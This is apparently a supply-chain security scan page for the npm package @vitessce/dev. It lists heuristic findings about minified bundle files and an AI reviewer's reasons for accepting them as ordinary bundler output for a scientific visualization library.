@vitessce/dev — Greenflagged

This package is the main `vitessce` package on NPM. It exports the `<Vitessce/>` from `@vitessce/all` for backwards compatibility.

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation npm registry signatures No source commit

keller-mark

Findings the reviewer chose to accept rather than block on.

Source	Rule	Reason	Accepted by	When
source-diff	net-exec-file:dist/ReactNeuroglancer-DvvZ7TpP.js	AI (source-diff): Neuroglancer React wrapper bundle; network calls are for neuroscience data fetching, expected.	ai	2026/05/26
source-diff	obfuscated-file:dist/index-BopFrQ1h.js	AI (source-diff): Minified 3D volume rendering code; legitimate bundler output.	ai	2026/05/26
source-diff	obfuscated-file:dist/lerc-CixLzOtk.js	AI (source-diff): LERC raster decoder library, minified; Esri Apache-licensed code, not malicious.	ai	2026/05/26
source-diff	obfuscated-file:dist/higlass-BNRNwGCm.js	AI (source-diff): Standard Vite-minified bundle for HiGlass visualization library; not malicious obfuscation.	ai	2026/05/26
source-diff	net-exec-file:dist/higlass-BNRNwGCm.js	AI (source-diff): Network calls and dynamic code in bundled HiGlass visualization code; expected for this package.	ai	2026/05/26
source-diff	obfuscated-file:dist/index-B31N-uNr.js	AI (source-diff): Standard Vite-minified main bundle; bundler boilerplate, not malicious.	ai	2026/05/26
source-diff	net-exec-file:dist/index-B31N-uNr.js	AI (source-diff): Network + dynamic code in main visualization bundle; expected for vitessce.	ai	2026/05/26
bogus-package	bogus-package	AI (bogus-package): Monorepo sub-package; sparse README and no keywords are expected for internal tooling packages.	ai	2026/05/02
typosquat	typosquat.levenshtein:ajv	AI (typosquat): Scoped @vitessce/* monorepo package; Levenshtein match to 'ajv' is coincidental, not a typosquat.	ai	2026/05/02

8 findings

HIGH New obfuscated file: dist/higlass-BNRNwGCm.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/higlass-BNRNwGCm.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/index-B31N-uNr.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/index-B31N-uNr.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/index-BopFrQ1h.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New obfuscated file: dist/lerc-CixLzOtk.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/ReactNeuroglancer-DvvZ7TpP.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.